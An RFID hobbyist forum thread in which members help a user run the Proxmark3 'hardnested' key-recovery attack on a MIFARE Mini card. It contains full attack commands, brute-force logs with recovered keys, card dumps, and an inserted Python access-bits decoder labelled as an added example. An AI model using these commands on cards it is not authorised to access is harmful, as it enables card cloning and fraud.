Proxmark3 community

Research, development and trades concerning the powerful Proxmark3 device.

Remember; sharing is caring. Bring something back to the community.


"Learn the tools of the trade the hard way." +Fravia


#1 2017-09-25 13:35:50

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Mifare Mini VS Mifare Classic

It's been a long time since I worked on RFID; please give me some help to get back on the right track:

I use PM3 with the Automatic Mifare crack Script.
The script works fine with the old card but it doesn't work with the new one.

old one: NXP Mifare Classic 1k/Mifare Plus (4 byte UID) 2K SL1 (ATQA=0004, SAK=08)

new one: NXP Mifare Mini (ATQA=0004, SAK=09)

Is there an attack for this tag?

note 1: I can't physically sniff between the reader and the tag

note 2: my currently loaded version of the PM3 firmware is old.

Offline

#2 2017-09-25 14:00:34

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

Oh my, Gaucho, now that was a long time indeed. Welcome back! I'm happy to see you here.


You need to read up on what's called the hardnested attack, which is the attack that works against a Mifare Classic tag that has an improved PRNG and no ACK bug.

You find it implemented in the latest source. Compile/flash and enjoy the enhancements.

You also find a new repo based on your old PM3Gui. Feel free to do your magic smile

Offline

#3 2017-09-25 14:35:03

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

Thank you Roel, I will try it and I will give feedback.

Offline

#4 2017-09-25 14:40:31

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

haha,  no,  sorry,  I'm not Roel...
but I became admin

Offline

#5 2017-09-25 16:39:11

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

Oh! Ciao Iceman, nice to meet you again.
Sorry, I read "Administrator" and I didn't read "iceman"; I'm becoming old and dumb.

Offline

#6 2017-09-25 23:16:22

marshmellow
Contributor
From: US
Registered: 2013-06-10
Posts: 2,302

Re: Mifare Mini VS Mifare Classic

welcome back gaucho  smile

Offline

#7 2017-09-26 10:32:49

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

Ciao marshmellow, nice to see you too.

I downloaded the compiled version from this thread: http://www.proxmark.org/forum/viewtopic.php?id=3975
I selected the last official version in the Google Drive folder.

I had some problems updating with the fullimage. I had to boot a few times with the button pressed, then install the old working version, then install the bootloader of the new version, then install the fullimage.
Finally it seems correctly updated!

I found this on GitHub: https://github.com/Proxmark/Gaucho-GUI
The strange fact is that in my local folder I have another version of the tool developed in VB.NET with a more updated XML configuration file.
Where is the updated XML file located? On GitHub I see an empty XML file.
If you don't have it, could we use my old one and start from it in order to update it? Where is the thread about this discussion?


I tried the hardnested attack.
I get the following, but maybe I didn't understand how to use it.

proxmark3> hf mf hardnested 0 A A0A1A2A3A4A5 50 B w s
--target block no: 50, target key type:B, known target key: 0x000000000000 (not set), file action: write, Slow: Yes, Tests: 0



 time    | #nonces | Activity                                                | expected to brute force
         |         |                                                         | #states         | time
------------------------------------------------------------------------------------------------------
       0 |       0 | Start using 4 threads and AVX SIMD core                 |                 |
       0 |       0 | Brute force benchmark: 249 million (2^27.9) keys/s      | 140737488355328 |    7d
       2 |       0 | Using 235 precalculated bitflip state tables            | 140737488355328 |    7d
#db# AcquireNonces: Can't select card (UID)
#db# AcquireNonces: Can't select card (UID)
       6 |       0 | Writing acquired nonces to binary file nonces.bin       | 140737488355328 |    7d
       7 |     112 | Apply bit flip properties                               |    616831057920 | 41min
       8 |     223 | Apply bit flip properties                               |    304204513280 | 20min
#db# AcquireNonces: Can't select card (UID)
       9 |     334 | Apply bit flip properties                               |    118500147200 |  8min
#db# AcquireNonces: Auth2 error len=1
#db# AcquireNonces: Can't select card (UID)
      11 |     445 | Apply bit flip properties                               |     90291929088 |  6min
      12 |     555 | Apply bit flip properties                               |     45307748352 |  3min
      13 |     666 | Apply bit flip properties                               |     45307748352 |  3min
      14 |     776 | Apply bit flip properties                               |     45307748352 |  3min
#db# AcquireNonces: Can't select card (ALL)
#db# Authentication failed. Card timeout.
#db# AcquireNonces: Auth1 error
      15 |     885 | Apply bit flip properties                               |     20603797504 |   83s
      16 |     995 | Apply bit flip properties                               |     20603797504 |   83s
      17 |    1104 | Apply bit flip properties                               |     20603797504 |   83s
      21 |    1213 | Apply Sum property. Sum(a0) = 120                       |      2457400832 |   10s
      22 |    1324 | Apply bit flip properties                               |      2457400832 |   10s
#db# Authentication failed. Card timeout.
#db# AcquireNonces: Auth1 error
      24 |    1435 | Apply bit flip properties                               |      2457400832 |   10s
#db# AcquireNonces: Can't select card (UID)
      25 |    1543 | Apply bit flip properties                               |      2457400832 |   10s
      25 |    1543 | (Ignoring Sum(a8) properties)                           |      2457400832 |   10s
      30 |    1543 | Starting brute force...                                 |      2457400832 |   10s
      41 |    1543 | Brute force phase completed. Key found: d01afeeb890a    |               0 |    0s

NOTE1: the found key is not usable to read block 50

NOTE2: I tried to use key A A0A1A2A3A4A5 to read block 0 but I get an authentication error. I think they changed the default password to read block 0. Is it possible? I understood that the hardnested attack works only if you know at least one key. Correct?

Offline

#8 2017-09-26 11:10:18

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

Regarding the Gaucho-GUI, this is the new repo which is to use C# instead of VB.NET. It is different than yours; the settings.xml is now called pm3commands.xml https://github.com/Proxmark/Gaucho-GUI/ … mmands.xml
The project is quite stale but uses your original ideas.

Regarding hardnested,
it needs one known key to work, and maybe the access rights are not right for the found key to work?

Offline

#9 2017-09-26 14:04:24

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

iceman wrote:

Regarding hardnested,
it needs one known key to work, and maybe the access rights are not right for the found key to work?

Sorry, I was wrong: block 0 can be correctly read with password a0a1a2a3a4a5.

So, how would you proceed for this exploit?

Did I understand the usage correctly? If I know key A of block 0 and I want key B of block 50, I should use the following command:

 hf mf hardnested 0 A A0A1A2A3A4A5 50 B w s


P.S. off topic: the XML on GitHub is almost empty, while the last XML file prepared by asper is much more complete, as you can see in the attached file: tool+xml

Last edited by gaucho (2017-09-26 14:43:08)

Offline

#10 2017-09-26 14:26:57

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

The Gaucho repo is set up but only 0xFFFF did some additions. It was supposed to bring order to the zip files with your original source code floating around on the internet. So yes, the pm3commands.xml needs to be filled with data smile Feel free to contribute.

The hardnested is called the way you did.

hf mf hardnested 0 A A0A1A2A3A4A5 50 B

You can add the 's' (slow) parameter if you need it. You don't need 'w'.

The attack worked for you, but the key B might not be allowed to r/w to the block/sector.
I'm not sure what you mean with "proceed for this exploit"...
You will do the same as for all Mifare Classic cards. Get all keys (both A/B), dump the card, ... you know, the usual stuff.

Offline

#11 2017-09-26 14:48:20

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

iceman wrote:

The attack worked for you, but the key B might not be allowed to r/w to the block/sector.

OK, I corrected the previous post: the key for block 0 is a0a1a2a3a4a5 and it works, while the found keys for block 50 (A and B) do not allow reading the data. This is strange because on the old tag block 50 can be written... I could try with other blocks...

proxmark3> hf mf hardnested 0 A a0a1a2a3a4a5 50 A w s
--target block no: 50, target key type:A, known target key: 0x000000000000 (not set), file action: write, Slow: Yes, Tests: 0



 time    | #nonces | Activity                                                | expected to brute force
         |         |                                                         | #states         | time
------------------------------------------------------------------------------------------------------
       0 |       0 | Start using 4 threads and AVX SIMD core                 |                 |
       0 |       0 | Brute force benchmark: 164 million (2^27.3) keys/s      | 140737488355328 |   10d
       7 |       0 | Using 235 precalculated bitflip state tables            | 140737488355328 |   10d
      12 |       0 | Writing acquired nonces to binary file nonces.bin       | 140737488355328 |   10d
#db# AcquireNonces: Can't select card (UID)
      13 |     112 | Apply bit flip properties                               |    362125426688 | 37min
      14 |     224 | Apply bit flip properties                               |    342383001600 | 35min
      15 |     336 | Apply bit flip properties                               |    231093567488 | 24min
      16 |     448 | Apply bit flip properties                               |    117451595776 | 12min
#db# AcquireNonces: Can't select card (UID)
      17 |     559 | Apply bit flip properties                               |     86514655232 |  9min
      18 |     670 | Apply bit flip properties                               |     81467498496 |  8min
      20 |     781 | Apply bit flip properties                               |     59585695744 |  6min
      21 |     891 | Apply bit flip properties                               |     56696315904 |  6min
      22 |    1000 | Apply bit flip properties                               |     56696315904 |  6min
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
#db# AcquireNonces: Auth2 error len=1
#db# AcquireNonces: Can't select card (UID)
      23 |    1111 | Apply bit flip properties                               |     41825263616 |  4min
      24 |    1221 | Apply bit flip properties                               |     41825263616 |  4min
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
      25 |    1330 | Apply bit flip properties                               |     39939891200 |  4min
      30 |    1439 | Apply Sum property. Sum(a0) = 128                       |     10160185344 |   62s
      33 |    1550 | Apply bit flip properties                               |     10160185344 |   62s
      37 |    1658 | Apply bit flip properties                               |      5059532800 |   31s
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
      40 |    1766 | Apply bit flip properties                               |      5059532800 |   31s
      42 |    1874 | Apply bit flip properties                               |      5059532800 |   31s
      45 |    1981 | Apply bit flip properties                               |      4719508480 |   29s
      45 |    1981 | (Ignoring Sum(a8) properties)                           |      4719508480 |   29s
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
      51 |    1981 | Starting brute force...                                 |      4719508480 |   29s
     114 |    1981 | Brute force phase completed. Key found: 5c8ff9990da2    |               0 |    0s

Last edited by gaucho (2017-09-26 14:48:51)

Offline

#12 2017-09-26 14:56:53

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

try block 51 and see if you get the same key?  You should of course..

Offline

#13 2017-09-26 15:03:45

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

Update:
I can read only the first 5 blocks, while block 5 cannot be read even if the key should be a0a1a2a3a4a5.

8E7F48FF46890400C840002000000015
A5000938093809380938000500050005
00050005000500050005000500050005
00000000000061E789C1000000000000
8805D882000485220000030002051979

I should find on my hard disk the datasheet where the memory structure is defined, in order to check the write permissions.

Offline

#14 2017-09-26 15:07:41

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

iceman wrote:

try block 51 and see if you get the same key?  You should of course..

Yes, the key A for block 51 is the same as for block 50.

Offline

#15 2017-09-26 15:19:01

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

Which command do you use to read with that key?

Offline

#16 2017-09-26 15:43:30

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

iceman wrote:

Which command do you use to read with that key?

I'm using another reader, an SL500.

For the access bits decoding I will use this tool: http://www.proxmark.org/forum/viewtopic.php?id=1408

Last edited by gaucho (2017-09-26 15:44:26)

Offline

#17 2017-09-26 15:50:57

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

Why don't you use the Proxmark3 to read block 50 with that key B?

Offline

#18 2017-09-26 16:22:12

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

OK, it seems to be a matter of write permissions.
With key a0a1a2a3a4a5 I can read the following blocks:

0  8E7F48FF46890400C840002000000015
1  A5000938093809380938000500050005
2  00050005000500050005000500050005
3  00000000000061E789C1000000000000

4  8805D882000485220000030002051979
5
6
7  0000000000001E11EE5A000000000000

8
9
10
11 0000000000000F00FF7A000000000000

12
13
14
15 0000000000000F00FFDD000000000000

16 
17
18
19 0000000000004B44BB5A000000000000

20
21
22
23

24
25
26
27

28
29
30
31

32
33
34
35

36
37
38
39

40
41
42
43

44
45
46
47

48
49
50
51

52
53
54
55

I tried to read block 51 with Keys obtained with the hardnested attack without success.

Offline
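Decoding the sector trailers from the dump above explains the pattern gaucho sees: key A may read blocks 0 to 4 and every trailer's access bits, but blocks 5, 6 and 8 to 10 are readable by key B only. This is an added example, not code from the thread or the Proxmark3 project; the access-condition tables are the ones in the MIFARE Classic datasheet, the trailer values are copied from the dump, and the 20-block size is the Mini's (5 sectors of 4 blocks).

```python
# Added example, not code from the thread: decode the access bits of the sector
# trailers dumped above and check which key may read each block (MIFARE Classic
# datasheet tables; the Mini uses the same 4-block sector layout as the 1K).
DATA_ACCESS = {  # (C1, C2, C3) -> read, write, increment, decrement
    (0, 0, 0): ("A|B", "A|B", "A|B", "A|B"),
    (0, 1, 0): ("A|B", "never", "never", "never"),
    (1, 0, 0): ("A|B", "B", "never", "never"),
    (1, 1, 0): ("A|B", "B", "B", "A|B"),
    (0, 0, 1): ("A|B", "never", "never", "A|B"),
    (0, 1, 1): ("B", "B", "never", "never"),
    (1, 0, 1): ("B", "never", "never", "never"),
    (1, 1, 1): ("never", "never", "never", "never"),
}
TRAILER_ACCESS = {  # -> keyA write, bits read, bits write, keyB read, keyB write
    (0, 0, 0): ("A", "A", "never", "A", "A"),
    (0, 1, 0): ("never", "A", "never", "A", "never"),
    (1, 0, 0): ("B", "A|B", "never", "never", "B"),
    (1, 1, 0): ("never", "A|B", "never", "never", "never"),
    (0, 0, 1): ("A", "A", "A", "A", "A"),
    (0, 1, 1): ("B", "A|B", "B", "never", "B"),
    (1, 0, 1): ("never", "A|B", "B", "never", "never"),
    (1, 1, 1): ("never", "A|B", "never", "never", "never"),
}
# Sector trailers copied from the dump above (blocks 3, 7 and 11).
SECTOR_TRAILERS = {
    0: "00000000000061E789C1000000000000",
    1: "0000000000001E11EE5A000000000000",
    2: "0000000000000F00FF7A000000000000",
}
MINI_BLOCKS = 20  # MIFARE Mini: 5 sectors x 4 blocks = 320 bytes


def decode_access_bits(trailer_hex):
    """{block_in_sector: (C1, C2, C3)} from a 16-byte trailer. Bytes 6-8 carry
    every bit plain and inverted; a mismatch means a corrupt or mis-read
    trailer, and writing one back would lock the sector for good."""
    t = bytes.fromhex(trailer_hex)
    b6, b7, b8 = t[6], t[7], t[8]
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4        # plain copies
    nc1, nc2, nc3 = b6 & 0x0F, b6 >> 4, b7 & 0x0F   # inverted copies
    if (c1 ^ nc1, c2 ^ nc2, c3 ^ nc3) != (0xF, 0xF, 0xF):
        raise ValueError("access bits fail their inverted-copy check")
    # bit i of each nibble belongs to block i of the sector (bit 3 = trailer)
    return {i: ((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)}


def describe_sector(trailer_hex):
    """Per-block rights of a 4-block sector, as dicts of who may do what."""
    bits = decode_access_bits(trailer_hex)
    out = {b: dict(zip(("read", "write", "inc", "dec"), DATA_ACCESS[bits[b]]))
           for b in range(3)}
    out[3] = dict(zip(("keyA_write", "bits_read", "bits_write", "keyB_read",
                       "keyB_write"), TRAILER_ACCESS[bits[3]]))
    return out


def key_can_read(trailer_hex, block_in_sector, key):
    """True if key 'A' or 'B' may read the block (trailer: its access bits)."""
    rights = describe_sector(trailer_hex)[block_in_sector]
    who = rights["read"] if block_in_sector < 3 else rights["bits_read"]
    return key in who.split("|")


def sector_of(block, total_blocks=MINI_BLOCKS):
    """(sector, block-in-sector), or None if the block is not on the card."""
    return divmod(block, 4) if 0 <= block < total_blocks else None
```

Running `describe_sector` over the three trailers reproduces the dump: sector 0 block 0 is read-only for both keys, sector 1 blocks 5 and 6 and all of sector 2 are key-B-only, and `sector_of(50)` returns None on a Mini.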

#19 2017-09-26 16:35:01

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

iceman wrote:

Why don't you use the proxmark3 to read the block50 with that key B?

I did it, i get the same result:

proxmark3> hf 14a reader
 UID : 8e 7f 48 ff
ATQA : 00 04
 SAK : 09 [2]
TYPE : NXP MIFARE Mini 0.3k
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
proxmark3> hf mf rdbl 50 B d01afeeb890a
--block no:50, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 51 B d01afeeb890a
--block no:51, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 52 B d01afeeb890a
--block no:52, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 49 B d01afeeb890a
--block no:49, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3>

Offline

#20 2017-09-26 16:44:24

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

Does the access bits calculator say the key B should be able to R/W on block 50?

Let's see:
block 50
  A == 5c8ff9990da2
  B == d01afeeb890a

hf mf rdbl 52 A 5c8ff9990da2
hf mf rdbl 52 B d01afeeb890a

Offline

#21 2017-09-26 17:53:57

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

iceman wrote:

Does the access bits calculator say the key B should be able to R/W on block 50?

Let's see:
block 50
  A == 5c8ff9990da2
  B == d01afeeb890a

hf mf rdbl 52 A 5c8ff9990da2
hf mf rdbl 52 B d01afeeb890a

Access bits for block 50 should be on block 51. Do you agree?
I tried to read block 51 without success.
I don't know how to proceed.
I suspect I miss something

Offline

#22 2017-09-26 18:19:33

marshmellow
Contributor
From: US
Registered: 2013-06-10
Posts: 2,302

Re: Mifare Mini VS Mifare Classic

I may be nuts, but if your card is a mifare mini it only has 20 blocks...

Offline

#23 2017-09-26 18:27:50

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

marshmellow wrote:

I may be nuts, but if your card is a mifare mini it only has 20 blocks...

This makes sense.
Maybe the reader uses two different approaches depending on the key that it finds. In one case (Mifare 1K) it writes block 50 and in another case (Mifare Mini) it writes block xxx (<20).

Are we sure mifare mini have only 20 blocks?
Edit: yes, http://www.orangetags.com/rfid-chip-datasheet/nxp-rfid-chip-datasheet/mifare/mifare-mini-datasheet/

Last edited by gaucho (2017-09-26 18:30:32)

Offline

#24 2017-09-26 18:30:41

marshmellow
Contributor
From: US
Registered: 2013-06-10
Posts: 2,302

Re: Mifare Mini VS Mifare Classic

Yep.  320 bytes, 5 sectors, 20 blocks.

Offline

#25 2017-09-26 18:32:29

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

Is there a script like the autopwn to get all the keys with the hardnested attack?

Offline

#26 2017-09-26 18:36:04

gaucho
Contributor
From: France
Registered: 2010-06-15
Posts: 444
Website

Re: Mifare Mini VS Mifare Classic

It's funny that the brute force also finds a key for a nonexistent block. It's something related to Chuck Norris.

Offline

#27 2017-09-26 18:58:20

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

Doesn't make sense...
hardnested shouldn't be able to gather nonces against a non-existent block.
So, the card you have attacked must have had a block 50.

The Mini is, as stated, only 5 sectors (20 blocks), which is why your reads of blocks 50 and 51 fail majorly... All normal now.
Your reads of the individual blocks should succeed up to block 19 (zero-based), all normal.

The found keys, try them against your sectors..

hf mf rdsc 0 a 5c8ff9990da2
hf mf rdsc 1 a 5c8ff9990da2
hf mf rdsc 2 a 5c8ff9990da2
hf mf rdsc 3 a 5c8ff9990da2
hf mf rdsc 4 a 5c8ff9990da2

There are some unreleased scripts which make hardnested behave like the nested...

Offline

#28 2017-09-27 19:26:14

piwi
Contributor
Registered: 2013-06-04
Posts: 704

Re: Mifare Mini VS Mifare Classic

Welcome back, Gaucho!

Idea: Mifare Mini uses only 5 bits for block addressing, i.e. block 50 = block 18? Or your card isn't a Mifare Mini...

Offline

#29 2017-09-27 20:08:30

iceman
Administrator
Registered: 2013-04-25
Posts: 9,537
Website

Re: Mifare Mini VS Mifare Classic

...a wrong block read/write must respond with a NACK of sorts if following the Mifare Classic protocol, i.e. a genuine tag. But clones like Fudan etc. could be more tolerant with those...

Offline
